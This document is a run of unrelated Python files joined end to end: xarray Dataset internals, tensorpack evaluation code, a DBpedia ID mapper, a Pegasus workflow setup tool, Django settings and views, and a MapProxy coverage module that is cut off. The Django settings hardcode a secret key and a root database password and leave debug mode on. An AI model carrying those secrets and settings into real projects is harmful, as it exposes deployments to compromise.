        Dataset. If the dataframe's index is a MultiIndex, it will be expanded
        into a tensor product of one-dimensional indices (filling in missing
        values with NaN). This method will produce a Dataset very similar to
        that on which the 'to_dataframe' method was called, except with
        possibly redundant dimensions (since all dataset variables will have
        the same dimensionality).
        """
        # TODO: Add an option to remove dimensions along which the variables
        # are constant, to enable consistent serialization to/from a dataframe,
        # even if some variables have different dimensionality.

        idx = dataframe.index
        obj = cls()

        if hasattr(idx, 'levels'):
            # it's a multi-index
            # expand the DataFrame to include the product of all levels
            full_idx = pd.MultiIndex.from_product(idx.levels, names=idx.names)
            dataframe = dataframe.reindex(full_idx)
            dims = [name if name is not None else 'level_%i' % n
                    for n, name in enumerate(idx.names)]
            for dim, lev in zip(dims, idx.levels):
                obj[dim] = (dim, lev)
            shape = [lev.size for lev in idx.levels]
        else:
            if idx.size:
                dims = (idx.name if idx.name is not None else 'index',)
                obj[dims[0]] = (dims, idx)
            else:
                dims = []
            shape = -1

        for name, series in iteritems(dataframe):
            data = series.values.reshape(shape)
            obj[name] = (dims, data)
        return obj

    @staticmethod
    def _unary_op(f):
        @functools.wraps(f)
        def func(self, *args, **kwargs):
            ds = self.coords.to_dataset()
            for k in self.data_vars:
                ds._variables[k] = f(self._variables[k], *args, **kwargs)
            return ds
        return func

    @staticmethod
    def _binary_op(f, reflexive=False, join='inner', drop_na_vars=True):
        @functools.wraps(f)
        def func(self, other):
            if isinstance(other, groupby.GroupBy):
                return NotImplemented
            if hasattr(other, 'indexes'):
                self, other = align(self, other, join=join, copy=False)
                empty_indexes = [d for d, s in self.dims.items() if s == 0]
                if empty_indexes:
                    raise ValueError('no overlapping labels for some '
                                     'dimensions: %s' % empty_indexes)
            g = f if not reflexive else lambda x, y: f(y, x)
            ds = self._calculate_binary_op(g, other, drop_na_vars=drop_na_vars)
            return ds
        return func

    @staticmethod
    def _inplace_binary_op(f):
        @functools.wraps(f)
        def func(self, other):
            if isinstance(other, groupby.GroupBy):
                raise TypeError('in-place operations between a Dataset and '
                                'a grouped object are not permitted')
            if hasattr(other, 'indexes'):
                other = other.reindex_like(self, copy=False)
            # we don't want to actually modify arrays in-place
            g = ops.inplace_to_noninplace_op(f)
            ds = self._calculate_binary_op(g, other, inplace=True)
            self._replace_vars_and_dims(ds._variables, ds._coord_names,
                                        ds._attrs, inplace=True)
            return self
        return func

    def _calculate_binary_op(self, f, other, inplace=False, drop_na_vars=True):

        def apply_over_both(lhs_data_vars, rhs_data_vars, lhs_vars, rhs_vars):
            dest_vars = OrderedDict()
            performed_op = False
            for k in lhs_data_vars:
                if k in rhs_data_vars:
                    dest_vars[k] = f(lhs_vars[k], rhs_vars[k])
                    performed_op = True
                elif inplace:
                    raise ValueError(
                        'datasets must have the same data variables '
                        'for in-place arithmetic operations: %s, %s'
                        % (list(lhs_data_vars), list(rhs_data_vars)))
                elif not drop_na_vars:
                    # this shortcuts left alignment of variables for fillna
                    dest_vars[k] = lhs_vars[k]
            if not performed_op:
                raise ValueError(
                    'datasets have no overlapping data variables: %s, %s'
                    % (list(lhs_data_vars), list(rhs_data_vars)))
            return dest_vars

        if utils.is_dict_like(other) and not isinstance(other, Dataset):
            # can't use our shortcut of doing the binary operation with
            # Variable objects, so apply over our data vars instead.
            new_data_vars = apply_over_both(self.data_vars, other,
                                            self.data_vars, other)
            return Dataset(new_data_vars)

        other_coords = getattr(other, 'coords', None)
        ds = self.coords.merge(other_coords)

        if isinstance(other, Dataset):
            new_vars = apply_over_both(self.data_vars, other.data_vars,
                                       self.variables, other.variables)
        else:
            other_variable = getattr(other, 'variable', other)
            new_vars = OrderedDict((k, f(self.variables[k], other_variable))
                                   for k in self.data_vars)

        ds._variables.update(new_vars)
        return ds


ops.inject_all_ops_and_reduce_methods(Dataset, array_only=False)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: common.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import random
import time
import threading
import multiprocessing
import numpy as np
from tqdm import tqdm
from six.moves import queue

from tensorpack import *
from tensorpack.utils.concurrency import *
from tensorpack.utils.stats import *


def play_one_episode(player, func, verbose=False):
    def f(s):
        spc = player.get_action_space()
        act = func([[s]])[0][0].argmax()
        if random.random() < 0.001:
            act = spc.sample()
        if verbose:
            print(act)
        return act
    return np.mean(player.play_one_episode(f))


def play_model(cfg, player):
    predfunc = OfflinePredictor(cfg)
    while True:
        score = play_one_episode(player, predfunc)
        print("Total:", score)


def eval_with_funcs(predictors, nr_eval, get_player_fn):
    class Worker(StoppableThread, ShareSessionThread):
        def __init__(self, func, queue):
            super(Worker, self).__init__()
            self._func = func
            self.q = queue

        def func(self, *args, **kwargs):
            if self.stopped():
                raise RuntimeError("stopped!")
            return self._func(*args, **kwargs)

        def run(self):
            with self.default_sess():
                player = get_player_fn(train=False)
                while not self.stopped():
                    try:
                        score = play_one_episode(player, self.func)
                        # print("Score, ", score)
                    except RuntimeError:
                        return
                    self.queue_put_stoppable(self.q, score)

    q = queue.Queue()
    threads = [Worker(f, q) for f in predictors]

    for k in threads:
        k.start()
        time.sleep(0.1)  # avoid simulator bugs
    stat = StatCounter()
    try:
        for _ in tqdm(range(nr_eval), **get_tqdm_kwargs()):
            r = q.get()
            stat.feed(r)
        logger.info("Waiting for all the workers to finish the last run...")
        for k in threads:
            k.stop()
        for k in threads:
            k.join()
        while q.qsize():
            r = q.get()
            stat.feed(r)
    except:
        logger.exception("Eval")
    finally:
        if stat.count > 0:
            return (stat.average, stat.max)
        return (0, 0)


def eval_model_multithread(cfg, nr_eval, get_player_fn):
    func = OfflinePredictor(cfg)
    NR_PROC = min(multiprocessing.cpu_count() // 2, 8)
    mean, max = eval_with_funcs([func] * NR_PROC, nr_eval, get_player_fn)
    logger.info("Average Score: {}; Max Score: {}".format(mean, max))


class Evaluator(Triggerable):
    def __init__(self, nr_eval, input_names, output_names, get_player_fn):
        self.eval_episode = nr_eval
        self.input_names = input_names
        self.output_names = output_names
        self.get_player_fn = get_player_fn

    def _setup_graph(self):
        NR_PROC = min(multiprocessing.cpu_count() // 2, 20)
        self.pred_funcs = [self.trainer.get_predictor(
            self.input_names, self.output_names)] * NR_PROC

    def _trigger(self):
        t = time.time()
        mean, max = eval_with_funcs(
            self.pred_funcs, self.eval_episode, self.get_player_fn)
        t = time.time() - t
        if t > 10 * 60:  # eval takes too long
            self.eval_episode = int(self.eval_episode * 0.94)
        self.trainer.monitors.put_scalar('mean_score', mean)
        self.trainer.monitors.put_scalar('max_score', max)


def play_n_episodes(player, predfunc, nr):
    logger.info("Start evaluation: ")
    for k in range(nr):
        if k != 0:
            player.restart_episode()
        score = play_one_episode(player, predfunc)
        print("{}/{}, score={}".format(k, nr, score))

import optparse
import pickle

#converts urls to wiki_id

parser = optparse.OptionParser()
parser.add_option('-i','--input', dest = 'input_file', help = 'input_file')
parser.add_option('-o','--output', dest = 'output_file', help = 'output_file')

(options, args) = parser.parse_args()

if options.input_file is None:
   options.input_file = raw_input('Enter input file:')

if options.output_file is None:
    options.output_file = raw_input('Enter output file:')


input_file = options.input_file

output_file = options.output_file

#define the dictionary url:wiki_id

wiki_from_url_dict = {}

with open('../../datasets/dbpedia/page_ids_en_2016.ttl','r') as f:

    for line in f:

        line = line.split(' ')

        if line[0] == '#':
            continue

        url = line[0] 

        wiki_id_list = line[2].split('\"')

        wiki_id = wiki_id_list[1]

        print(url, wiki_id)

        wiki_from_url_dict[url] = int(wiki_id)

output_file_write = open(output_file,'w')

#iterate through the page links and turn urls into wiki_ids

max_wiki_id = max(wiki_from_url_dict.values()) + 1

local_id = {}

count = 0

with open(input_file) as page_links:

    for line in page_links:

        line = line.split(' ')

        if line[0] == '#':
            continue

        url_1 = line[0]
        url_2 = line[2]

        #if wiki_id not found, assign an id = max_wiki_id and increment max_wiki_id

        try:

            wiki_id1 = wiki_from_url_dict[url_1] #first entity has wiki_id

            try:
                wiki_id2 = wiki_from_url_dict[url_2] #first and second entities have wiki_ids

            except (KeyError, IndexError): #first entity has wiki_id, second entity doesn't

                try: #check if a local id has already been assigned

                    wiki_id2 = local_id[url_2]

                except (KeyError, IndexError):

                    wiki_id2 = max_wiki_id

                    local_id[url_2] = wiki_id2

                    max_wiki_id +=1

        except (KeyError, IndexError): #first entity doesn't have wiki_id

            try:
                wiki_id1 = local_id[url_1]

            except (KeyError, IndexError):

                wiki_id1 = max_wiki_id

                local_id[url_1] = wiki_id1

                max_wiki_id += 1

            try: #first entity doesn't have wiki_id, second entity has it

                wiki_id2 = wiki_from_url_dict[url_2]

            except (KeyError, IndexError): #neither first nor second entity have wiki_ids


                try: #check if a local id has already been assigned

                    wiki_id2 = local_id[url_2]

                except (KeyError, IndexError):

                    wiki_id2 = max_wiki_id

                    local_id[url_2] = wiki_id2

                    max_wiki_id +=1


        output_file_write.write('%d %d\n' %(wiki_id1,wiki_id2))

        print count

        count += 1

output_file_write.close()


pickle.dump(local_id,open('../../datasets/dbpedia/local_id_to_url_full_mapping_based.p','wb'))

import errno
import os
import pwd
import shutil
import sys

from jinja2 import Environment, FileSystemLoader


class TutorialEnv:
    LOCAL_MACHINE = ("Local Machine Condor Pool", "submit-host")
    USC_HPCC_CLUSTER = ("USC HPCC Cluster", "usc-hpcc")
    OSG_FROM_ISI = ("OSG from ISI submit node", "osg")
    XSEDE_BOSCO = ("XSEDE, with Bosco", "xsede-bosco")
    BLUEWATERS_GLITE = ("Bluewaters, with Glite", "bw-glite")
    TACC_WRANGLER = ("TACC Wrangler with Glite", "wrangler-glite")
    OLCF_TITAN = ("OLCF TITAN with Glite", "titan-glite")
    OLCF_SUMMIT_KUBERNETES_BOSCO = (
        "OLCF Summit from Kubernetes using BOSCO",
        "summit-kub-bosco",
    )


class TutorialExample:
    PROCESS = ("Process", "process")
    PIPELINE = ("Pipeline", "pipeline")
    SPLIT = ("Split", "split")
    MERGE = ("Merge", "merge")
    EPA = ("EPA (requires R)", "r-epa")
    DIAMOND = ("Diamond", "diamond")
    CONTAINER = ("Population Modeling using Containers", "population")
    MPI = ("MPI Hello World", "mpi-hw")


def choice(question, options, default):
    "Ask the user to choose from a short list of named options"
    while True:
        sys.stdout.write("{} ({}) [{}]: ".format(question, "/".join(options), default))
        answer = sys.stdin.readline().strip()
        if len(answer) == 0:
            return default
        for opt in options:
            if answer == opt:
                return answer


def yesno(question, default="y"):
    "Ask the user a yes/no question"
    while True:
        sys.stdout.write("{} (y/n) [{}]: ".format(question, default))
        answer = sys.stdin.readline().strip().lower()
        if len(answer) == 0:
            answer = default
        if answer == "y":
            return True
        elif answer == "n":
            return False


def query(question, default=None):
    "Ask the user a question and return the response"
    while True:
        if default:
            sys.stdout.write("{} [{}]: ".format(question, default))
        else:
            sys.stdout.write("%s: " % question)
        answer = sys.stdin.readline().strip().replace(" ", "_")
        if answer == "":
            if default:
                return default
        else:
            return answer


def optionlist(question, options, default=0):
    "Ask the user to choose from a list of options"
    for i, option in enumerate(options):
        print("%d: %s" % (i + 1, option[0]))
    while True:
        sys.stdout.write("%s (1-%d) [%d]: " % (question, len(options), default + 1))
        answer = sys.stdin.readline().strip()
        if len(answer) == 0:
            return options[default][1]
        try:
            optno = int(answer)
            if optno > 0 and optno <= len(options):
                return options[optno - 1][1]
        except Exception:
            pass


class Workflow:
    def __init__(self, workflowdir, sharedir):
        self.jinja = Environment(loader=FileSystemLoader(sharedir), trim_blocks=True)
        self.name = os.path.basename(workflowdir)
        self.workflowdir = workflowdir
        self.sharedir = sharedir
        self.properties = {}
        self.home = os.environ["HOME"]
        self.user = pwd.getpwuid(os.getuid())[0]
        self.tutorial = None
        self.generate_tutorial = False
        self.tutorial_setup = None
        self.compute_queue = "default"
        self.project = "MYPROJ123"
        sysname, _, _, _, machine = os.uname()
        if sysname == "Darwin":
            self.os = "MACOSX"
        else:
            # Probably Linux
            self.os = sysname.upper()
        self.arch = machine

    def copy_template(self, template, dest, mode=0o644):
        "Copy template to dest in workflowdir with mode"
        path = os.path.join(self.workflowdir, dest)
        t = self.jinja.get_template(template)
        t.stream(**self.__dict__).dump(path)
        os.chmod(path, mode)

    def copy_dir(self, src, dest):
        # self.mkdir(dest)
        if not src.startswith("/"):
            src = os.path.join(self.sharedir, src)
        try:
            dest = os.path.join(self.workflowdir, dest)
            shutil.copytree(src, dest)
        except OSError as exc:  # python >2.5
            if exc.errno == errno.ENOTDIR:
                shutil.copy(src, dest)
            else:
                raise

    def mkdir(self, path):
        "Make relative directory in workflowdir"
        path = os.path.join(self.workflowdir, path)
        if not os.path.exists(path):
            os.makedirs(path)

    def configure(self):
        # The tutorial is a special case
        if yesno("Do you want to generate a tutorial workflow?", "n"):
            self.config = "tutorial"
            self.daxgen = "tutorial"
            self.generate_tutorial = True

            # determine the environment to setup tutorial for
            self.tutorial_setup = optionlist(
                "What environment is tutorial to be setup for?",
                [
                    TutorialEnv.LOCAL_MACHINE,
                    TutorialEnv.USC_HPCC_CLUSTER,
                    TutorialEnv.OSG_FROM_ISI,
                    TutorialEnv.XSEDE_BOSCO,
                    TutorialEnv.BLUEWATERS_GLITE,
                    TutorialEnv.TACC_WRANGLER,
                    TutorialEnv.OLCF_TITAN,
                    TutorialEnv.OLCF_SUMMIT_KUBERNETES_BOSCO,
                ],
            )

            # figure out what example options to provide
            examples = [
                TutorialExample.PROCESS,
                TutorialExample.PIPELINE,
                TutorialExample.SPLIT,
                TutorialExample.MERGE,
                TutorialExample.EPA,
                TutorialExample.CONTAINER,
            ]
            if self.tutorial_setup != "osg":
                examples.append(TutorialExample.DIAMOND)

            if self.tutorial_setup in [
                "bw-glite",
                "wrangler-glite",
                "titan-glite",
                "summit-kub-bosco",
            ]:
                examples.append(TutorialExample.MPI)
                self.project = query(
                    "What project your jobs should run under. For example on TACC there are like : TG-DDM160003 ?"
                )

            self.tutorial = optionlist("What tutorial workflow do you want?", examples)

            self.setup_tutorial()
            return

        # Determine which DAX generator API to use
        self.daxgen = choice(
            "What DAX generator API do you want to use?",
            ["python", "perl", "java", "r"],
            "python",
        )

        # Determine what kind of site catalog we need to generate
        self.config = optionlist(
            "What does your computing infrastructure look like?",
            [
                ("Local Machine Condor Pool", "condorpool"),
                ("Remote Cluster using Globus GRAM", "globus"),
                ("Remote Cluster using CREAMCE", "creamce"),
                ("Local PBS Cluster with Glite", "glite"),
                ("Remote PBS Cluster with BOSCO and SSH", "bosco"),
            ],
        )

        # Find out some information about the site
        self.sitename = query("What do you want to call your compute site?", "compute")
        self.os = choice(
            "What OS does your compute site have?", ["LINUX", "MACOSX"], self.os
        )
        self.arch = choice(
            "What architecture does your compute site have?",
            ["x86_64", "x86"],
            self.arch,
        )

    def setup_tutorial(self):
        """
        Set up tutorial for pre-defined computing environments
        :return:
        """

        if self.tutorial_setup is None:
            self.tutorial_setup = "submit-host"

        if self.tutorial_setup == "submit-host":
            self.sitename = "condorpool"
        elif self.tutorial_setup == "usc-hpcc":
            self.sitename = "usc-hpcc"
            self.config = "glite"
            self.compute_queue = "quick"
            # for running the whole workflow as mpi job
            self.properties["pegasus.job.aggregator"] = "mpiexec"
        elif self.tutorial_setup == "osg":
            self.sitename = "osg"
            self.os = "linux"
            if not yesno("Do you want to use Condor file transfers", "y"):
                self.staging_site = "isi_workflow"
        elif self.tutorial_setup == "xsede-bosco":
            self.sitename = "condorpool"
        elif self.tutorial_setup == "bw-glite":
            self.sitename = "bluewaters"
            self.config = "glite"
            self.compute_queue = "normal"
        elif self.tutorial_setup == "wrangler-glite":
            self.sitename = "wrangler"
            self.config = "glite"
            self.compute_queue = "normal"
        elif self.tutorial_setup == "titan-glite":
            self.sitename = "titan"
            self.config = "glite"
            self.compute_queue = "titan"
        elif self.tutorial_setup == "summit-kub-bosco":
            self.sitename = "summit"
            self.config = "bosco"
            self.compute_queue = "batch"
        return

    def generate(self):
        os.makedirs(self.workflowdir)
        if self.tutorial != "population":
            self.mkdir("input")
        self.mkdir("output")

        if self.generate_tutorial:
            self.copy_template("%s/tc.txt" % self.tutorial, "tc.txt")

            if self.tutorial == "r-epa":
                self.copy_template("%s/daxgen.R" % self.tutorial, "daxgen.R")
            elif self.tutorial != "mpi-hw":
                self.copy_template("%s/daxgen.py" % self.tutorial, "daxgen.py")

            if self.tutorial == "diamond":

                # Executables used by the diamond workflow
                self.mkdir("bin")
                self.copy_template(
                    "diamond/transformation.py", "bin/preprocess", mode=0o755
                )
                self.copy_template(
                    "diamond/transformation.py", "bin/findrange", mode=0o755
                )
                self.copy_template(
                    "diamond/transformation.py", "bin/analyze", mode=0o755
                )

                # Diamond input file
                self.copy_template("diamond/f.a", "input/f.a")
            elif self.tutorial == "split":
                # Split workflow input file
                self.mkdir("bin")
                self.copy_template("split/pegasus.html", "input/pegasus.html")
            elif self.tutorial == "r-epa":
                # Executables used by the R-EPA workflow
                self.mkdir("bin")
                self.copy_template(
                    "r-epa/epa-wrapper.sh", "bin/epa-wrapper.sh", mode=0o755
                )
                self.copy_template("r-epa/setupvar.R", "bin/setupvar.R", mode=0o755)
                self.copy_template(
                    "r-epa/weighted.average.R", "bin/weighted.average.R", mode=0o755
                )
                self.copy_template(
                    "r-epa/cumulative.percentiles.R",
                    "bin/cumulative.percentiles.R",
                    mode=0o755,
                )
            elif self.tutorial == "population":
                self.copy_template("%s/Dockerfile" % self.tutorial, "Dockerfile")
                self.copy_template("%s/Singularity" % self.tutorial, "Singularity")
                self.copy_template(
                    "%s/tc.txt.containers" % self.tutorial, "tc.txt.containers"
                )
                self.copy_dir("%s/scripts" % self.tutorial, "scripts")
                self.copy_dir("%s/data" % self.tutorial, "input")
                # copy the mpi wrapper, c code and mpi
            elif self.tutorial == "mpi-hw":
                # copy the mpi wrapper, c code and mpi example
                # Executables used by the mpi-hw workflow
                self.mkdir("bin")
                self.copy_template(
                    "%s/pegasus-mpi-hw.c" % self.tutorial, "pegasus-mpi-hw.c"
                )
                self.copy_template("%s/Makefile" % self.tutorial, "Makefile")
                self.copy_template("%s/daxgen.py.template" % self.tutorial, "daxgen.py")
                self.copy_template(
                    "%s/mpi-hello-world-wrapper" % self.tutorial,
                    "bin/mpi-hello-world-wrapper",
                    mode=0o755,
                )
                self.copy_template("split/pegasus.html", "input/f.in")

        else:
            self.copy_template("tc.txt", "tc.txt")
            if self.daxgen == "python":
                self.copy_template("daxgen/daxgen.py", "daxgen.py")
            elif self.daxgen == "perl":
                self.copy_template("daxgen/daxgen.pl", "daxgen.pl")
            elif self.daxgen == "java":
                self.copy_template("daxgen/DAXGen.java", "DAXGen.java")
            elif self.daxgen == "r":
                self.copy_template("daxgen/daxgen.R", "daxgen.R")
            else:
                assert False

        self.copy_template("sites.xml", "sites.xml")
        self.copy_template("plan_dax.sh", "plan_dax.sh", mode=0o755)
        self.copy_template("plan_cluster_dax.sh", "plan_cluster_dax.sh", mode=0o755)
        self.copy_template("generate_dax.sh", "generate_dax.sh", mode=0o755)
        self.copy_template("README.md", "README.md")
        self.copy_template("rc.txt", "rc.txt")
        self.copy_template("pegasus.properties", "pegasus.properties")

        if self.tutorial == "diamond":
            if self.tutorial_setup == "wrangler-glite":
                self.copy_template(
                    "pmc-wrapper.wrangler", "bin/pmc-wrapper", mode=0o755
                )
            elif self.tutorial_setup == "titan-glite":
                self.copy_template("pmc-wrapper.titan", "bin/pmc-wrapper", mode=0o755)
            elif self.tutorial_setup == "wrangler-glite":
                self.copy_template(
                    "pmc-wrapper.wrangler", "bin/pmc-wrapper", mode=0o755
                )
            elif self.tutorial_setup == "summit-kub-bosco":
                self.copy_template("pmc-wrapper.summit", "bin/pmc-wrapper", mode=0o755)

        if self.generate_tutorial:
            sys.stdout.write(
                "Pegasus Tutorial setup for example workflow - %s for execution on %s in directory %s\n"
                % (self.tutorial, self.tutorial_setup, self.workflowdir)
            )


def usage():
    print("Usage: %s WORKFLOW_DIR" % sys.argv[0])


def main(pegasus_share_dir):
    if len(sys.argv) != 2:
        usage()
        exit(1)

    if "-h" in sys.argv:
        usage()
        exit(1)

    workflowdir = sys.argv[1]
    if os.path.exists(workflowdir):
        print("ERROR: WORKFLOW_DIR '%s' already exists" % workflowdir)
        exit(1)

    workflowdir = os.path.abspath(workflowdir)
    sharedir = os.path.join(pegasus_share_dir, "init")
    w = Workflow(workflowdir, sharedir)
    w.configure()
    w.generate()

"""
Django settings for sparta project.

For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))


# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ')mg$xo^v*2mmwidr0ak6%9&!@e18v8t#7@+vd+wqg8kydb48k7'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

TEMPLATE_DEBUG = True

ALLOWED_HOSTS = []


# Application definition

INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'blog',
)

MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
)

ROOT_URLCONF = 'sparta.urls'

WSGI_APPLICATION = 'sparta.wsgi.application'


# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'USER':'root',
        'NAME':'fordjango',
        'PASSWORD':'123456',
        'HOST':'localhost',
        'PORT':''
    }
}

# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True


# Static files (CSS, JavaScript, Images)

STATIC_ROOT = os.path.join('/home/dexter/weaponx/Django/sparta/sparta/static')

STATIC_URL = '/assets/'

STATICFILES_DIRS = (
    '/home/dexter/weaponx/Django/sparta/sparta/assets',
)
TEMPLATE_DIRS=('/home/dexter/weaponx/Django/sparta/sparta/template',)
# coding=utf8
from django.views.generic import ListView, DetailView, CreateView
from django.db.models import Q
from django.http import JsonResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.shortcuts import render
from pure_pagination.mixins import PaginationMixin
from django.contrib.auth.mixins import LoginRequiredMixin

from django.conf import settings
from books.models import Publish, Author, Book
from books.forms import PublishForm

import json
import logging

logger = logging.getLogger('opsweb')




class PublishListView(LoginRequiredMixin, PaginationMixin, ListView):
    '''
    动作：getlist, create
    '''
    model = Publish
    template_name = "books/publish_list.html"
    context_object_name = "publish_list"
    paginate_by = 5
    keyword = ''

    def get_queryset(self):
        queryset = super(PublishListView, self).get_queryset()
        self.keyword = self.request.GET.get('keyword', '').strip()
        if self.keyword:
            queryset = queryset.filter(Q(name__icontains=self.keyword) |
                                       Q(address__icontains=self.keyword) |
                                       Q(city__icontains=self.keyword))
        return queryset

    def get_context_data(self, **kwargs):
        context = super(PublishListView, self).get_context_data(**kwargs)
        context['keyword'] = self.keyword
        return context

    def post(self, request):
        form = PublishForm(request.POST)
        if form.is_valid():
            form.save()
            res = {'code': 0, 'result': '添加出版商成功'}
        else:
            # form.errors会把验证不通过的信息以对象的形式传到前端，前端直接渲染即可
            res = {'code': 1, 'errmsg': form.errors}
            print form.errors
        return JsonResponse(res, safe=True)


class PublishDetailView(LoginRequiredMixin, DetailView):
    '''
    动作：getone, update, delete
    '''
    model = Publish
    template_name = "books/publish_detail.html"
    context_object_name = 'publish'
    next_url = '/books/publishlist/'

    def post(self, request, *args, **kwargs):
        pk = kwargs.get('pk')
        p = self.model.objects.get(pk=pk)
        form = PublishForm(request.POST, instance=p)
        if form.is_valid():
            form.save()
            res = {"code": 0, "result": "更新出版商成功", 'next_url': self.next_url}
        else:
            res = {"code": 1, "errmsg": form.errors, 'next_url': self.next_url}
        return render(request, settings.JUMP_PAGE, res)
        # return HttpResponseRedirect(reverse('books:publish_detail',args=[pk]))

    def delete(self, request, *args, **kwargs):
        pk = kwargs.get('pk')
        # 通过出版社对象查所在该出版社的书籍，如果有关联书籍不可以删除，没有关联书籍可以删除
        try:
            obj = self.model.objects.get(pk=pk)
            if not obj.book_set.all():
                self.model.objects.filter(pk=pk).delete()
                res = {"code": 0, "result": "删除出版商成功"}
            else:
                res = {"code": 1, "errmsg": "该出版社有关联书籍,请联系管理员"}
        except:
            res = {"code": 1, "errmsg": "删除错误请联系管理员"}
        return JsonResponse(res, safe=True)


#!/bin/env python

import itertools
import collections


def read_table(filename):
    with open(filename) as fp:
        header = next(fp).split()
        rows = [line.split()[1:] for line in fp if line.strip()]
        columns = zip(*rows)
    data = dict(zip(header, columns))
    return data

table = read_table("../../data/colldata.txt")
pots = sorted(table)

alphabet = "+-?"
for num in range(2, len(table) + 1):
    for group in itertools.combinations(pots, num):
        patterns = zip(*[table[p] for p in group])
        counts = collections.Counter(patterns)
        for poss in itertools.product(alphabet, repeat=num):
            print ', '.join(group) + ':',
            print ''.join(poss), counts[poss]

# This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import with_statement

import operator
import threading

from mapproxy.grid import bbox_intersects, bbox_contains
from mapproxy.util.py import cached_property
from mapproxy.util.geom import (
    require_geom_support,
    load_polygon_lines,
    transform_geometry,
    bbox_polygon,
)
from mapproxy.srs import SRS

import logging
log_config = logging.getLogger('mapproxy.config.coverage')

try:
    import shapely.geometry
    import shapely.prepared
except ImportError:
    # missing Shapely is handled by require_geom_support
    pass

def coverage(geom, srs):
    if isinstance(geom, (list, tuple)):
        return BBOXCoverage(geom, srs)
    else:
        return GeomCoverage(geom, srs)

def load_limited_to(limited_to):
    require_geom_support()
    srs = SRS(limited_to['srs'])
    geom = limited_to['geometry']

    if not hasattr(geom, 'type'): # not a Shapely geometry
        if isinstance(geom, (list, tuple)):
            geom = bbox_polygon(geom)
        else:
            polygons = load_polygon_lines(geom.split('\n'))
            if len(polygons) == 1:
                geom = polygons[0]
            else:
                geom = shapely.geometry.MultiPolygon(polygons)

    return GeomCoverage(geom, srs, clip=True)

class MultiCoverage(object):
    clip = False
    """Aggregates multiple coverages"""
    def __init__(self, coverages):
        self.coverages = coverages
        self.bbox = self.extent.bbox

    @cached_property
    def extent(self):
        return reduce(operator.add, [c.extent for c in self.coverages])

    def intersects(self, bbox, srs):
        return any(c.intersects(bbox, srs) for c in self.coverages)

    def contains(self, bbox, srs):
        return any(c.contains(bbox, srs) for c in self.coverages)

    def transform_to(self, srs):
        return MultiCoverage([c.transform_to(srs) for c in self.coverages])

    def __eq__(self, other):
        if not isinstance(other, MultiCoverage):
            return NotImplemented

        if self.bbox != other.bbox:
            return False

        if len(self.coverages) != len(other.coverages):
            return False

        for a, b in zip(self.coverages, other.coverages):
            if a != b:
                return False

        return True

    def __ne__(self, other):
        if not isinstance(other, MultiCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<MultiCoverage %r: %r>' % (self.extent.llbbox, self.coverages)

class BBOXCoverage(object):
    clip = False
    def __init__(self, bbox, srs):
        self.bbox = bbox
        self.srs = srs
        self.geom = None

    @property
    def extent(self):
        from mapproxy.layer import MapExtent

        return MapExtent(self.bbox, self.srs)

    def _bbox_in_coverage_srs(self, bbox, srs):
        if srs != self.srs:
            bbox = srs.transform_bbox_to(self.srs, bbox)
        return bbox

    def intersects(self, bbox, srs):
        bbox = self._bbox_in_coverage_srs(bbox, srs)
        return bbox_intersects(self.bbox, bbox)

    def intersection(self, bbox, srs):
        bbox = self._bbox_in_coverage_srs(bbox, srs)
        intersection = (
            max(self.bbox[0], bbox[0]),
            max(self.bbox[1], bbox[1]),
            min(self.bbox[2], bbox[2]),
            min(self.bbox[3], bbox[3]),
        )

        if intersection[0] >= intersection[2] or intersection[1] >= intersection[3]:
            return None
        return BBOXCoverage(intersection, self.srs)

    def contains(self, bbox, srs):
        bbox = self._bbox_in_coverage_srs(bbox, srs)
        return bbox_contains(self.bbox, bbox)

    def transform_to(self, srs):
        if srs == self.srs:
            return self

        bbox = self.srs.transform_bbox_to(srs, self.bbox)
        return BBOXCoverage(bbox, srs)

    def __eq__(self, other):
        if not isinstance(other, BBOXCoverage):
            return NotImplemented

        if self.srs != other.srs:
            return False

        if self.bbox != other.bbox:
            return False

        return True

    def __ne__(self, other):
        if not isinstance(other, BBOXCoverage):
            return NotImplemented
        return not self.__eq__(other)

    def __repr__(self):
        return '<BBOXCoverage %r/%r>' % (self.extent.llbbox, self.bbox)


class GeomCoverage(object):
    def __init__(self, geom, srs, clip=False):
        self.geom = geom
        self.bbox = geom.bounds
        self.srs = srs
        self.clip = clip
        self._prep_lock = threading.Lock()
        self._prepared_geom = None
        self._prepared_counter = 0
        self._prepared_max = 10000

    @property
    def extent(self):
        from mapproxy.layer import MapExtent
        return MapExtent(self.bbox, self.srs)

    @property
    def prepared_geom(self):
        # GEOS internal data structure for prepared geometries grows over time,
        # recreate to limit memory consumption
